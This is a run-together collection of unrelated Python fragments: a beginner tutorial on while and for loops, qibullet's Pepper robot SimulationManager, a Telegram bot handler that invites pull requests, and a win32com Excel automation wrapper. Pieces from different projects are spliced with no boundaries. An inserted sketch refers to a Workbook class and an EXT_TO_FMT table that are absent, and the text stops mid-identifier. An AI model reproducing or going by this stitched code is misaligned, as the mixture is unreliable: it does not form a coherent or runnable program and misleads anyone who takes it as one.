When we want execute a certain instructions multiple times, then we use loops Python - 2 types of loops for while In other languages like JAVA C++ C C# etc for while do while ''' # while : # write statements here counter = 10 while counter >= 0: print("Current counter value is ", counter) counter = counter - 1 print("Loop over") print("----------------------------------------") # Loop control statements - continue and break counter = 10 while True: if counter < 0: break print("Current counter value is ", counter) counter = counter - 1 print("----------------------------------------") counter = 10 while counter >= 0: if counter % 2 == 0: counter = counter - 1 continue print("Current counter value is ", counter) counter = counter - 1 print("Loop over") print("----------------------------------------") # function range # range(10) - generate numbers from 0-9 # for loop - for iteration_variable in [collection]: # print("For loop example --------") for num in range(10): print(num) print("For loop example --------") # range(stop_number) - uniformly spaced integers between 0 and stop_number in steps of 1 # range(start_number, stop_number) - uniformly spaced integers between start_number and stop_number in steps of 1 # range(start_number, stop_number, step_number) print("range(stop_number) example-=---------") for num in range(10): print(num) print("range(start_number, stop_number) example-=---------") for num in range(4, 12): print(num) print("range(start_number, stop_number, step_number) example-=---------") for num in range(5, 26, 3): print(num) #!/usr/bin/env python # coding: utf-8 import time import pybullet import threading import pybullet_data from qibullet.laser import Laser from qibullet.camera import Camera from qibullet.pepper_virtual import PepperVirtual from qibullet.base_controller import BaseController class SimulationManager: """ Class allowing to handle the different parameters of a pybullet simulation """ def __init__(self): """ Constructor """ pass def launchSimulation(self, gui=True): """ Launches a simulation instance Parameters: gui - Boolean, if True the simulation is launched with a GUI, and with no GUI otherwise Returns: physics_client - The id of the simulation client created """ if gui: physics_client = pybullet.connect(pybullet.GUI) pybullet.setRealTimeSimulation(1, physicsClientId=physics_client) pybullet.configureDebugVisualizer( pybullet.COV_ENABLE_RGB_BUFFER_PREVIEW, 0, physicsClientId=physics_client) pybullet.configureDebugVisualizer( pybullet.COV_ENABLE_DEPTH_BUFFER_PREVIEW, 0, physicsClientId=physics_client) pybullet.configureDebugVisualizer( pybullet.COV_ENABLE_SEGMENTATION_MARK_PREVIEW, 0, physicsClientId=physics_client) else: physics_client = pybullet.connect(pybullet.DIRECT) threading.Thread( target=self._stepSimulation, args=[physics_client]).start() pybullet.setGravity(0, 0, -9.81, physicsClientId=physics_client) return physics_client def resetSimulation(self, physics_client): """ Resets the simulated instance corresponding to the physics client id. 
All of the objects loaded in the simulation will be destroyed, but the instance will still be running """ self._clearInstance(physics_client) pybullet.resetSimulation(physicsClientId=physics_client) def stopSimulation(self, physics_client): """ Stops the simulated instance corresponding to the physics_client id Parameters: physics_client - The id of the simulated instance to be stopped """ self._clearInstance(physics_client) pybullet.disconnect(physicsClientId=physics_client) def spawnPepper( self, physics_client, translation=[0, 0, 0], quaternion=[0, 0, 0, 1], spawn_ground_plane=False): """ Loads a Pepper model in the simulation Parameters: physics_client - The id of the simulated instance in which the robot is supposed to be spawned translation - List containing 3 elements, the spawning translation [x, y, z] in the WORLD frame quaternions - List containing 4 elements, the spawning rotation as a quaternion [x, y, z, w] in the WORLD frame spawn_ground_plane - If True, the pybullet_data ground plane will be spawned Returns: pepper - A PepperVirtual object, the Pepper simulated instance """ pepper = PepperVirtual() if spawn_ground_plane: pybullet.setAdditionalSearchPath(pybullet_data.getDataPath()) pybullet.loadMJCF( "mjcf/ground_plane.xml", physicsClientId=physics_client) pepper.loadRobot( translation, quaternion, physicsClientId=physics_client) return pepper def removePepper(self, pepper_virtual): """ Removes a Pepper from a simulated instance Parameters: pepper_virtual - The virtual Pepper robot to be removed """ pepper_virtual.laser_manager._terminateScan() pepper_virtual.base_controller._terminateController() pepper_virtual.unsubscribeCamera(PepperVirtual.ID_CAMERA_TOP) pepper_virtual.unsubscribeCamera(PepperVirtual.ID_CAMERA_BOTTOM) pepper_virtual.unsubscribeCamera(PepperVirtual.ID_CAMERA_DEPTH) pybullet.removeBody(pepper_virtual.robot_model) def _clearInstance(self, physics_client): """ INTERNAL METHOD, Called to kill the processes running in a simulated instance, before resetting or stopping it. Parameters: physics_client - The client id of the simulated instance that will be cleared """ for laser in Laser._getInstances(): if laser.physics_client == physics_client: laser._terminateScan() for camera in Camera._getInstances(): if camera.physics_client == physics_client: camera._resetActiveCamera() for controller in BaseController._getInstances(): controller._terminateController() def _stepSimulation(self, physics_client): """ INTERNAL METHOD: This method is only used for a simulation in DIRECT mode (without the gui). Parameters: physics_client - The id of the simulated instance to be stepped """ try: while True: pybullet.stepSimulation(physicsClientId=physics_client) time.sleep(1./240.) 
except Exception: pass import logging from telegram import Update, User from telegram.ext import Updater, Dispatcher, CommandHandler, CallbackContext logger = logging.getLogger(__name__) MSG = ( "Would you like to make PR for this?\n" "You can start by forking me at https://github.com/vldc-hq/vldc-bot\n" "💪😎" ) def add_pr(upd: Updater, handlers_group: int): logger.info("registering PR handler") dp: Dispatcher = upd.dispatcher dp.add_handler(CommandHandler("pr", _pr, run_async=True), handlers_group) def _pr(update: Update, context: CallbackContext): user: User = ( update.message.reply_to_message.from_user if update.message.reply_to_message else None ) msg = f"@{user.username} " + MSG if user else MSG context.bot.send_message(update.effective_chat.id, msg) """ Typical hierarchy for Microsoft Excel is Excel Application > Workbooks > Workbook > Sheet. https://docs.microsoft.com/en-us/office/vba/api/excel.workbook """ import os import sys import atexit import signal import win32com.client from .prop_utils import ProxyProperty, ProxyMethod, HashDict, ItemStorage from .fields import ConstantItem __all__ = ['Excel', 'Workbook', 'should_init_sig', 'set_init_sig', 'init_sig_shutdown', 'shutdown'] def is_gencache_available(): """Determine if make_py has been run (i.e. early binding is setup). Early binding helps get class/object documentation in development. """ return win32com.client.gencache.GetClassForProgID('Excel.Application') is not None def init_gencache(): """Initialize the gencache for early binding.""" if not is_gencache_available(): try: # Create the gencache application and delete it gen = win32com.client.gencache.EnsureDispatch('Excel.Application') gen.Quit() del gen except (AttributeError, TypeError, ValueError, Exception): pass # Call init gencache. Required for constants! 
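# ---------------------------------------------------------------------------
# Editor's sketch (hedged): the practical difference between late and early
# binding that is_gencache_available()/init_gencache() above care about.
# Assumes pywin32 and a local Excel install; only win32com.client APIs already
# referenced in this module are used. Late binding (Dispatch/DispatchEx)
# resolves attributes dynamically and leaves win32com.client.constants without
# the Excel enumerations, while gencache.EnsureDispatch() generates the makepy
# wrappers so that names such as win32com.client.constants.xlCSV become
# available, which the EXT_TO_FMT table in the Workbook class below relies on.
def _early_binding_demo():
    import win32com.client

    xl = win32com.client.gencache.EnsureDispatch('Excel.Application')
    try:
        from win32com.client import constants
        # With the generated wrappers loaded, Excel enumerations resolve:
        print('xlCSV =', constants.xlCSV)
        print('xlWorkbookDefault =', constants.xlWorkbookDefault)
    finally:
        xl.Quit()
# ---------------------------------------------------------------------------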
init_gencache() SETTINGS = { 'is_parallel': True, # Custom setting # 'ActiveCell': None, # 'ActiveChart': None, # 'ActiveEncryptionSession': -1, # 'ActivePrinter': "", # 'ActiveProtectedViewWindow': None, # 'ActiveSheet': None, # 'ActiveWindow': None, # 'ActiveWorkbook': None, 'AlertBeforeOverwriting': True, 'AltStartupPath': "", 'AlwaysUseClearType': False, 'AskToUpdateLinks': False, 'AutoFormatAsYouTypeReplaceHyperlinks': True, 'AutomationSecurity': 3, # Optimized for load time 'AutoPercentEntry': True, # 'Calculation': constants.xlCalculationAutomatic, # 'CalculateBeforeSave': False, 'CalculationInterruptKey': 2, # 'CalculationState': 0, # 'CalculationVersion': 181029, # 'Caller': -2146826265, # 'CanPlaySounds': True, # 'CanRecordSounds': True, 'Caption': "Excel", 'CellDragAndDrop': True, # 'Cells': None, 'ChartDataPointTrack': True, # 'Charts': None, 'ClusterConnector': "", # 'Columns': None, 'CommandUnderlines': -4105, # 'ConstrainNumeric': False, 'CopyObjectsWithCells': True, # 'Creator': 1480803660, 'Cursor': -4143, 'CutCopyMode': 0, # 'DataEntryMode': -4146, 'DecimalSeparator': ".", 'DefaultSaveFormat': 51, 'DefaultSheetDirection': -5003, 'DeferAsyncQueries': False, 'DisplayAlerts': False, # Optimized for load time 'DisplayClipboardWindow': False, 'DisplayCommentIndicator': -1, # 'DisplayDocumentActionTaskPane': False, 'DisplayDocumentInformationPanel': False, 'DisplayExcel4Menus': False, 'DisplayFormulaAutoComplete': True, 'DisplayFormulaBar': True, 'DisplayFullScreen': False, 'DisplayFunctionToolTips': True, 'DisplayInsertOptions': True, 'DisplayNoteIndicator': True, 'DisplayPasteOptions': True, 'DisplayRecentFiles': True, 'DisplayScrollBars': True, 'DisplayStatusBar': True, 'EditDirectlyInCell': True, 'EnableAnimations': True, 'EnableAutoComplete': True, 'EnableCancelKey': 1, 'EnableCheckFileExtensions': True, 'EnableEvents': True, 'EnableLargeOperationAlert': True, 'EnableLivePreview': True, 'EnableMacroAnimations': False, 'EnableSound': False, # 'Excel4IntlMacroSheets': None, # 'Excel4MacroSheets': None, 'ExtendList': True, 'FeatureInstall': 0, # 'FileConverters': None, 'FileValidation': 0, 'FileValidationPivot': 0, 'FixedDecimal': False, 'FixedDecimalPlaces': 2, 'FlashFill': True, 'FlashFillMode': False, 'FormulaBarHeight': 1, 'GenerateGetPivotData': False, 'GenerateTableRefs': 1, 'HighQualityModeForGraphics': False, # 'Hinstance': 16384000, # 'HinstancePtr': 16384000, # 'Hwnd': 1051558, 'IgnoreRemoteRequests': False, 'Interactive': False, # Optimized for load time # 'IsSandboxed': False, # 'Iteration': -2146826246, 'LargeOperationCellThousandCount': 33554, # 'MailSession': None, 'MapPaperSize': True, # 'MathCoprocessorAvailable': True, # 'MaxChange': -2146826246, # 'MaxIterations': -2146826246, 'MeasurementUnit': 0, 'MergeInstances': True, # 'MouseAvailable': True, 'MoveAfterReturn': True, 'MoveAfterReturnDirection': -4121, # 'Names': None, # 'NetworkTemplatesPath': "", 'ODBCTimeout': 45, 'OnWindow': None, # 'OrganizationName': "", # 'PathSeparator': "\\", 'PivotTableSelection': False, # 'PreviousSelections': None, 'PrintCommunication': False, # Optimized for load time 'PromptForSummaryInfo': False, # 'Ready': True, # 'RecordRelative': False, 'ReferenceStyle': 1, # 'RegisteredFunctions': None, 'RollZoom': False, # 'Rows': None, 'ScreenUpdating': False, # Optimized for load time # 'Selection': None, # 'Sheets': None, 'ShowChartTipNames': True, 'ShowChartTipValues': True, 'ShowDevTools': True, 'ShowMenuFloaties': True, 'ShowQuickAnalysis': True, 'ShowSelectionFloaties': False, 
'ShowStartupDialog': False, 'ShowToolTips': True, 'StandardFont': "Calibri", 'StatusBar': False, # Optimized for load time # 'ThisCell': None, # 'ThisWorkbook': None, 'ThousandsSeparator': ",", # 'TransitionMenuKey': "/", # 'TransitionNavigKeys': False, 'UseClusterConnector': False, # 'UseClusterConnector': False, 'UserControl': False, 'UseSystemSeparators': True, # 'Value': "Microsoft Excel", # 'VBE': None, 'Visible': False, 'WarnOnFunctionNameConflict': False, # 'WindowsForPens': False, 'WindowState': -4143, # 'Worksheets': None, } def compare_xl_com(xl_com, settings): """Return if the given xl_com object has all of the same settings.""" if not isinstance(xl_com, dict): xl_com = get_xl_com_settings(xl_com) return xl_com == settings def get_xl_com_settings(xl, **settings): """Get the current settings.""" values = {} for k in SETTINGS: obj = getattr(xl, k, None) if isinstance(getattr(Excel, k, None), ProxyMethod): # Get the value from the method values[k] = obj() else: # Get the value from the property values[k] = obj # Update with the given settings values.update(settings) return values def set_xl_com_settings(xl, **settings): """Set the given attribute settings.""" # Set the given attributes for k, v in settings.items(): try: # Set the property setattr(xl, k, v) except (AttributeError, Exception) as err: try: # Call the setter method if str(err).startswith(Excel.METHOD_SETTER_ERROR): func = getattr(xl, k, None) if callable(func): func(v) except (AttributeError, TypeError, ValueError, Exception): raise err def get_xl_com_for_settings(**xl_settings): """Create or return a global excel object to minimize the number of existing excel objects.""" # Get the settings with defaults settings = SETTINGS.copy() settings.update(Excel.DEFAULT_SETTINGS) settings.update(xl_settings) try: # Get the existing excel settings xl = Excel.GLOBAL_EXCELS[settings] except (KeyError, Exception): # Create a new excel object for the settings and return the excel object is_parallel = settings.get('is_parallel', None) if is_parallel or is_parallel is None: xl = win32com.client.DispatchEx("Excel.Application") else: xl = win32com.client.Dispatch("Excel.Application") # Set the given attributes set_xl_com_settings(xl, **settings) # Save the object Excel.GLOBAL_EXCELS.append(xl) # Return the excel object return xl class Excel(object): METHOD_SETTER_ERROR = 'Cannot set property ' DEFAULT_SETTINGS = { 'DisplayAlerts': False, # If False hides prompt to save 'AutomationSecurity': 1, 'Interactive': False, 'PrintCommunication': False, } GLOBAL_EXCELS = ItemStorage(compare_func=compare_xl_com) def __new__(cls, **kwargs): obj = super().__new__(cls) obj.is_parallel = kwargs.get('is_parallel', True) obj._xl = None # Set the settings settings = SETTINGS.copy() settings.update(cls.DEFAULT_SETTINGS) settings.update(kwargs) obj._settings = settings return obj def __init__(self, **kwargs): super().__init__() if not hasattr(self, '_xl'): self._xl = None if not hasattr(self, '_settings'): settings = SETTINGS.copy() settings.update(self.DEFAULT_SETTINGS) settings.update(kwargs) self._settings = settings # Use settings to create excel application object. 
def get_settings(self, **settings): """Get the current settings.""" if self._xl is None: return self._settings.copy() settings = get_xl_com_settings(self, **settings) self._settings = settings.copy() # Might as well save current settings return settings def set_settings(self, **settings): """Set the given attribute settings.""" # Set the given attributes set_xl_com_settings(self, **settings) @property def xl(self): """Get (or create) the Excel Application attribute.""" if self._xl is None: # Catch SIGTERM/SIGINT to close excel safely! if should_init_sig() and len(Excel.GLOBAL_EXCELS) == 1: init_sig_shutdown() # Find or create the application using settings self._xl = get_xl_com_for_settings(**self._settings.copy()) return self._xl @xl.setter def xl(self, value): """Set the Excel Application attribute.""" if value is None: # Save settings in case of recreate try: self._settings = get_xl_com_settings(self._xl) except (AttributeError, ValueError, TypeError, Exception): pass else: self._settings = get_xl_com_settings(value) # Save the given xl com object or None. self._xl = value def __enter__(self): return self def __exit__(self, exception_type, exception_value, traceback): self.Quit() return exception_type is None # Methods Application object? https://docs.microsoft.com/en-us/office/vba/api/excel.application(object) ActivateMicrosoftApp = ProxyMethod('xl.ActivateMicrosoftApp', setter_error=METHOD_SETTER_ERROR) AddCustomList = ProxyMethod('xl.AddCustomList', setter_error=METHOD_SETTER_ERROR) Calculate = ProxyMethod('xl.Calculate', setter_error=METHOD_SETTER_ERROR) CalculateFull = ProxyMethod('xl.CalculateFull', setter_error=METHOD_SETTER_ERROR) CalculateFullRebuild = ProxyMethod('xl.CalculateFullRebuild', setter_error=METHOD_SETTER_ERROR) CalculateUntilAsyncQueriesDone = ProxyMethod('xl.CalculateUntilAsyncQueriesDone', setter_error=METHOD_SETTER_ERROR) CentimetersToPoints = ProxyMethod('xl.CentimetersToPoints', setter_error=METHOD_SETTER_ERROR) CheckAbort = ProxyMethod('xl.CheckAbort', setter_error=METHOD_SETTER_ERROR) CheckSpelling = ProxyMethod('xl.CheckSpelling', setter_error=METHOD_SETTER_ERROR) ConvertFormula = ProxyMethod('xl.ConvertFormula', setter_error=METHOD_SETTER_ERROR) DDEExecute = ProxyMethod('xl.DDEExecute', setter_error=METHOD_SETTER_ERROR) DDEInitiate = ProxyMethod('xl.DDEInitiate', setter_error=METHOD_SETTER_ERROR) DDEPoke = ProxyMethod('xl.DDEPoke', setter_error=METHOD_SETTER_ERROR) DDERequest = ProxyMethod('xl.DDERequest', setter_error=METHOD_SETTER_ERROR) DDETerminate = ProxyMethod('xl.DDETerminate', setter_error=METHOD_SETTER_ERROR) DeleteCustomList = ProxyMethod('xl.DeleteCustomList', setter_error=METHOD_SETTER_ERROR) DisplayXMLSourcePane = ProxyMethod('xl.DisplayXMLSourcePane', setter_error=METHOD_SETTER_ERROR) DoubleClick = ProxyMethod('xl.DoubleClick', setter_error=METHOD_SETTER_ERROR) Evaluate = ProxyMethod('xl.Evaluate', setter_error=METHOD_SETTER_ERROR) ExecuteExcel4Macro = ProxyMethod('xl.ExecuteExcel4Macro', setter_error=METHOD_SETTER_ERROR) FindFile = ProxyMethod('xl.FindFile', setter_error=METHOD_SETTER_ERROR) GetCustomListContents = ProxyMethod('xl.GetCustomListContents', setter_error=METHOD_SETTER_ERROR) GetCustomListNum = ProxyMethod('xl.GetCustomListNum', setter_error=METHOD_SETTER_ERROR) GetOpenFilename = ProxyMethod('xl.GetOpenFilename', setter_error=METHOD_SETTER_ERROR) GetPhonetic = ProxyMethod('xl.GetPhonetic', setter_error=METHOD_SETTER_ERROR) GetSaveAsFilename = ProxyMethod('xl.GetSaveAsFilename', setter_error=METHOD_SETTER_ERROR) Goto = 
ProxyMethod('xl.Goto', setter_error=METHOD_SETTER_ERROR) Help = ProxyMethod('xl.Help', setter_error=METHOD_SETTER_ERROR) InchesToPoints = ProxyMethod('xl.InchesToPoints', setter_error=METHOD_SETTER_ERROR) InputBox = ProxyMethod('xl.InputBox', setter_error=METHOD_SETTER_ERROR) Intersect = ProxyMethod('xl.Intersect', setter_error=METHOD_SETTER_ERROR) MacroOptions = ProxyMethod('xl.MacroOptions', setter_error=METHOD_SETTER_ERROR) MailLogoff = ProxyMethod('xl.MailLogoff', setter_error=METHOD_SETTER_ERROR) MailLogon = ProxyMethod('xl.MailLogon', setter_error=METHOD_SETTER_ERROR) NextLetter = ProxyMethod('xl.NextLetter', setter_error=METHOD_SETTER_ERROR) OnKey = ProxyMethod('xl.OnKey', setter_error=METHOD_SETTER_ERROR) OnRepeat = ProxyMethod('xl.OnRepeat', setter_error=METHOD_SETTER_ERROR) OnTime = ProxyMethod('xl.OnTime', setter_error=METHOD_SETTER_ERROR) OnUndo = ProxyMethod('xl.OnUndo', setter_error=METHOD_SETTER_ERROR) Quit = ProxyMethod('xl.Quit', setter_error=METHOD_SETTER_ERROR) RecordMacro = ProxyMethod('xl.RecordMacro', setter_error=METHOD_SETTER_ERROR) RegisterXLL = ProxyMethod('xl.RegisterXLL', setter_error=METHOD_SETTER_ERROR) Repeat = ProxyMethod('xl.Repeat', setter_error=METHOD_SETTER_ERROR) Run = ProxyMethod('xl.Run', setter_error=METHOD_SETTER_ERROR) SendKeys = ProxyMethod('xl.SendKeys', setter_error=METHOD_SETTER_ERROR) SharePointVersion = ProxyMethod('xl.SharePointVersion', setter_error=METHOD_SETTER_ERROR) Undo = ProxyMethod('xl.Undo', setter_error=METHOD_SETTER_ERROR) Union = ProxyMethod('xl.Union', setter_error=METHOD_SETTER_ERROR) Volatile = ProxyMethod('xl.Volatile', setter_error=METHOD_SETTER_ERROR) Wait = ProxyMethod('xl.Wait', setter_error=METHOD_SETTER_ERROR) # Properties ActiveCell = ProxyProperty('xl.ActiveCell') ActiveChart = ProxyProperty('xl.ActiveChart') ActiveEncryptionSession = ProxyProperty('xl.ActiveEncryptionSession') ActivePrinter = ProxyProperty('xl.ActivePrinter') ActiveProtectedViewWindow = ProxyProperty('xl.ActiveProtectedViewWindow') ActiveSheet = ProxyProperty('xl.ActiveSheet') ActiveWindow = ProxyProperty('xl.ActiveWindow') ActiveWorkbook = ProxyProperty('xl.ActiveWorkbook') AddIns = ProxyProperty('xl.AddIns') AddIns2 = ProxyProperty('xl.AddIns2') AlertBeforeOverwriting = ProxyProperty('xl.AlertBeforeOverwriting') AltStartupPath = ProxyProperty('xl.AltStartupPath') AlwaysUseClearType = ProxyProperty('xl.AlwaysUseClearType') Application = ProxyProperty('xl.Application') ArbitraryXMLSupportAvailable = ProxyProperty('xl.ArbitraryXMLSupportAvailable') AskToUpdateLinks = ProxyProperty('xl.AskToUpdateLinks') Assistance = ProxyProperty('xl.Assistance') AutoCorrect = ProxyProperty('xl.AutoCorrect') AutoFormatAsYouTypeReplaceHyperlinks = ProxyProperty('xl.AutoFormatAsYouTypeReplaceHyperlinks') AutomationSecurity = ProxyProperty('xl.AutomationSecurity') AutoPercentEntry = ProxyProperty('xl.AutoPercentEntry') AutoRecover = ProxyProperty('xl.AutoRecover') Build = ProxyProperty('xl.Build') CalculateBeforeSave = ProxyProperty('xl.CalculateBeforeSave') Calculation = ProxyProperty('xl.Calculation') CalculationInterruptKey = ProxyProperty('xl.CalculationInterruptKey') CalculationState = ProxyProperty('xl.CalculationState') CalculationVersion = ProxyProperty('xl.CalculationVersion') Caller = ProxyProperty('xl.Caller') CanPlaySounds = ProxyProperty('xl.CanPlaySounds') CanRecordSounds = ProxyProperty('xl.CanRecordSounds') Caption = ProxyProperty('xl.Caption') CellDragAndDrop = ProxyProperty('xl.CellDragAndDrop') Cells = ProxyProperty('xl.Cells') ChartDataPointTrack = 
ProxyProperty('xl.ChartDataPointTrack') Charts = ProxyProperty('xl.Charts') ClipboardFormats = ProxyProperty('xl.ClipboardFormats') ClusterConnector = ProxyProperty('xl.ClusterConnector') Columns = ProxyProperty('xl.Columns') COMAddIns = ProxyProperty('xl.COMAddIns') CommandBars = ProxyProperty('xl.CommandBars') CommandUnderlines = ProxyProperty('xl.CommandUnderlines') ConstrainNumeric = ProxyProperty('xl.ConstrainNumeric') ControlCharacters = ProxyProperty('xl.ControlCharacters') CopyObjectsWithCells = ProxyProperty('xl.CopyObjectsWithCells') Creator = ProxyProperty('xl.Creator') Cursor = ProxyProperty('xl.Cursor') CursorMovement = ProxyProperty('xl.CursorMovement') CustomListCount = ProxyProperty('xl.CustomListCount') CutCopyMode = ProxyProperty('xl.CutCopyMode') DataEntryMode = ProxyProperty('xl.DataEntryMode') DDEAppReturnCode = ProxyProperty('xl.DDEAppReturnCode') DecimalSeparator = ProxyProperty('xl.DecimalSeparator') DefaultFilePath = ProxyProperty('xl.DefaultFilePath') DefaultSaveFormat = ProxyProperty('xl.DefaultSaveFormat') DefaultSheetDirection = ProxyProperty('xl.DefaultSheetDirection') DefaultWebOptions = ProxyProperty('xl.DefaultWebOptions') DeferAsyncQueries = ProxyProperty('xl.DeferAsyncQueries') Dialogs = ProxyProperty('xl.Dialogs') DisplayAlerts = ProxyProperty('xl.DisplayAlerts') DisplayClipboardWindow = ProxyProperty('xl.DisplayClipboardWindow') DisplayCommentIndicator = ProxyProperty('xl.DisplayCommentIndicator') DisplayDocumentActionTaskPane = ProxyProperty('xl.DisplayDocumentActionTaskPane') DisplayDocumentInformationPanel = ProxyProperty('xl.DisplayDocumentInformationPanel') DisplayExcel4Menus = ProxyProperty('xl.DisplayExcel4Menus') DisplayFormulaAutoComplete = ProxyProperty('xl.DisplayFormulaAutoComplete') DisplayFormulaBar = ProxyProperty('xl.DisplayFormulaBar') DisplayFullScreen = ProxyProperty('xl.DisplayFullScreen') DisplayFunctionToolTips = ProxyProperty('xl.DisplayFunctionToolTips') DisplayInsertOptions = ProxyProperty('xl.DisplayInsertOptions') DisplayNoteIndicator = ProxyProperty('xl.DisplayNoteIndicator') DisplayPasteOptions = ProxyProperty('xl.DisplayPasteOptions') DisplayRecentFiles = ProxyProperty('xl.DisplayRecentFiles') DisplayScrollBars = ProxyProperty('xl.DisplayScrollBars') DisplayStatusBar = ProxyProperty('xl.DisplayStatusBar') EditDirectlyInCell = ProxyProperty('xl.EditDirectlyInCell') EnableAnimations = ProxyProperty('xl.EnableAnimations') EnableAutoComplete = ProxyProperty('xl.EnableAutoComplete') EnableCancelKey = ProxyProperty('xl.EnableCancelKey') EnableCheckFileExtensions = ProxyProperty('xl.EnableCheckFileExtensions') EnableEvents = ProxyProperty('xl.EnableEvents') EnableLargeOperationAlert = ProxyProperty('xl.EnableLargeOperationAlert') EnableLivePreview = ProxyProperty('xl.EnableLivePreview') EnableMacroAnimations = ProxyProperty('xl.EnableMacroAnimations') EnableSound = ProxyProperty('xl.EnableSound') ErrorCheckingOptions = ProxyProperty('xl.ErrorCheckingOptions') Excel4IntlMacroSheets = ProxyProperty('xl.Excel4IntlMacroSheets') Excel4MacroSheets = ProxyProperty('xl.Excel4MacroSheets') ExtendList = ProxyProperty('xl.ExtendList') FeatureInstall = ProxyProperty('xl.FeatureInstall') FileConverters = ProxyProperty('xl.FileConverters') FileDialog = ProxyProperty('xl.FileDialog') FileExportConverters = ProxyProperty('xl.FileExportConverters') FileValidation = ProxyProperty('xl.FileValidation') FileValidationPivot = ProxyProperty('xl.FileValidationPivot') FindFormat = ProxyProperty('xl.FindFormat') FixedDecimal = 
ProxyProperty('xl.FixedDecimal') FixedDecimalPlaces = ProxyProperty('xl.FixedDecimalPlaces') FlashFill = ProxyProperty('xl.FlashFill') FlashFillMode = ProxyProperty('xl.FlashFillMode') FormulaBarHeight = ProxyProperty('xl.FormulaBarHeight') GenerateGetPivotData = ProxyProperty('xl.GenerateGetPivotData') GenerateTableRefs = ProxyProperty('xl.GenerateTableRefs') Height = ProxyProperty('xl.Height') HighQualityModeForGraphics = ProxyProperty('xl.HighQualityModeForGraphics') Hinstance = ProxyProperty('xl.Hinstance') HinstancePtr = ProxyProperty('xl.HinstancePtr') Hwnd = ProxyProperty('xl.Hwnd') IgnoreRemoteRequests = ProxyProperty('xl.IgnoreRemoteRequests') Interactive = ProxyProperty('xl.Interactive') International = ProxyProperty('xl.International') IsSandboxed = ProxyProperty('xl.IsSandboxed') Iteration = ProxyProperty('xl.Iteration') LanguageSettings = ProxyProperty('xl.LanguageSettings') LargeOperationCellThousandCount = ProxyProperty('xl.LargeOperationCellThousandCount') Left = ProxyProperty('xl.Left') LibraryPath = ProxyProperty('xl.LibraryPath') MailSession = ProxyProperty('xl.MailSession') MailSystem = ProxyProperty('xl.MailSystem') MapPaperSize = ProxyProperty('xl.MapPaperSize') MathCoprocessorAvailable = ProxyProperty('xl.MathCoprocessorAvailable') MaxChange = ProxyProperty('xl.MaxChange') MaxIterations = ProxyProperty('xl.MaxIterations') MeasurementUnit = ProxyProperty('xl.MeasurementUnit') MergeInstances = ProxyProperty('xl.MergeInstances') MouseAvailable = ProxyProperty('xl.MouseAvailable') MoveAfterReturn = ProxyProperty('xl.MoveAfterReturn') MoveAfterReturnDirection = ProxyProperty('xl.MoveAfterReturnDirection') MultiThreadedCalculation = ProxyProperty('xl.MultiThreadedCalculation') Name = ProxyProperty('xl.Name') Names = ProxyProperty('xl.Names') NetworkTemplatesPath = ProxyProperty('xl.NetworkTemplatesPath') NewWorkbook = ProxyProperty('xl.NewWorkbook') ODBCErrors = ProxyProperty('xl.ODBCErrors') ODBCTimeout = ProxyProperty('xl.ODBCTimeout') OLEDBErrors = ProxyProperty('xl.OLEDBErrors') OnWindow = ProxyProperty('xl.OnWindow') OperatingSystem = ProxyProperty('xl.OperatingSystem') OrganizationName = ProxyProperty('xl.OrganizationName') Parent = ProxyProperty('xl.Parent') Path = ProxyProperty('xl.Path') PathSeparator = ProxyProperty('xl.PathSeparator') PivotTableSelection = ProxyProperty('xl.PivotTableSelection') PreviousSelections = ProxyProperty('xl.PreviousSelections') PrintCommunication = ProxyProperty('xl.PrintCommunication') ProductCode = ProxyProperty('xl.ProductCode') PromptForSummaryInfo = ProxyProperty('xl.PromptForSummaryInfo') ProtectedViewWindows = ProxyProperty('xl.ProtectedViewWindows') QuickAnalysis = ProxyProperty('xl.QuickAnalysis') Range = ProxyProperty('xl.Range') Ready = ProxyProperty('xl.Ready') RecentFiles = ProxyProperty('xl.RecentFiles') RecordRelative = ProxyProperty('xl.RecordRelative') ReferenceStyle = ProxyProperty('xl.ReferenceStyle') RegisteredFunctions = ProxyProperty('xl.RegisteredFunctions') ReplaceFormat = ProxyProperty('xl.ReplaceFormat') RollZoom = ProxyProperty('xl.RollZoom') Rows = ProxyProperty('xl.Rows') RTD = ProxyProperty('xl.RTD') ScreenUpdating = ProxyProperty('xl.ScreenUpdating') Selection = ProxyProperty('xl.Selection') Sheets = ProxyProperty('xl.Sheets') SheetsInNewWorkbook = ProxyProperty('xl.SheetsInNewWorkbook') ShowChartTipNames = ProxyProperty('xl.ShowChartTipNames') ShowChartTipValues = ProxyProperty('xl.ShowChartTipValues') ShowDevTools = ProxyProperty('xl.ShowDevTools') ShowMenuFloaties = ProxyProperty('xl.ShowMenuFloaties') 
ShowQuickAnalysis = ProxyProperty('xl.ShowQuickAnalysis') ShowSelectionFloaties = ProxyProperty('xl.ShowSelectionFloaties') ShowStartupDialog = ProxyProperty('xl.ShowStartupDialog') ShowToolTips = ProxyProperty('xl.ShowToolTips') SmartArtColors = ProxyProperty('xl.SmartArtColors') SmartArtLayouts = ProxyProperty('xl.SmartArtLayouts') SmartArtQuickStyles = ProxyProperty('xl.SmartArtQuickStyles') Speech = ProxyProperty('xl.Speech') SpellingOptions = ProxyProperty('xl.SpellingOptions') StandardFont = ProxyProperty('xl.StandardFont') StandardFontSize = ProxyProperty('xl.StandardFontSize') StartupPath = ProxyProperty('xl.StartupPath') StatusBar = ProxyProperty('xl.StatusBar') TemplatesPath = ProxyProperty('xl.TemplatesPath') ThisCell = ProxyProperty('xl.ThisCell') ThisWorkbook = ProxyProperty('xl.ThisWorkbook') ThousandsSeparator = ProxyProperty('xl.ThousandsSeparator') Top = ProxyProperty('xl.Top') TransitionMenuKey = ProxyProperty('xl.TransitionMenuKey') TransitionMenuKeyAction = ProxyProperty('xl.TransitionMenuKeyAction') TransitionNavigKeys = ProxyProperty('xl.TransitionNavigKeys') UsableHeight = ProxyProperty('xl.UsableHeight') UsableWidth = ProxyProperty('xl.UsableWidth') UseClusterConnector = ProxyProperty('xl.UseClusterConnector') UsedObjects = ProxyProperty('xl.UsedObjects') UserControl = ProxyProperty('xl.UserControl') UserLibraryPath = ProxyProperty('xl.UserLibraryPath') UserName = ProxyProperty('xl.UserName') UseSystemSeparators = ProxyProperty('xl.UseSystemSeparators') Value = ProxyProperty('xl.Value') VBE = ProxyProperty('xl.VBE') Version = ProxyProperty('xl.Version') Visible = ProxyProperty('xl.Visible') WarnOnFunctionNameConflict = ProxyProperty('xl.WarnOnFunctionNameConflict') Watches = ProxyProperty('xl.Watches') Width = ProxyProperty('xl.Width') Windows = ProxyProperty('xl.Windows') WindowsForPens = ProxyProperty('xl.WindowsForPens') WindowState = ProxyProperty('xl.WindowState') Workbooks = ProxyProperty('xl.Workbooks') WorksheetFunction 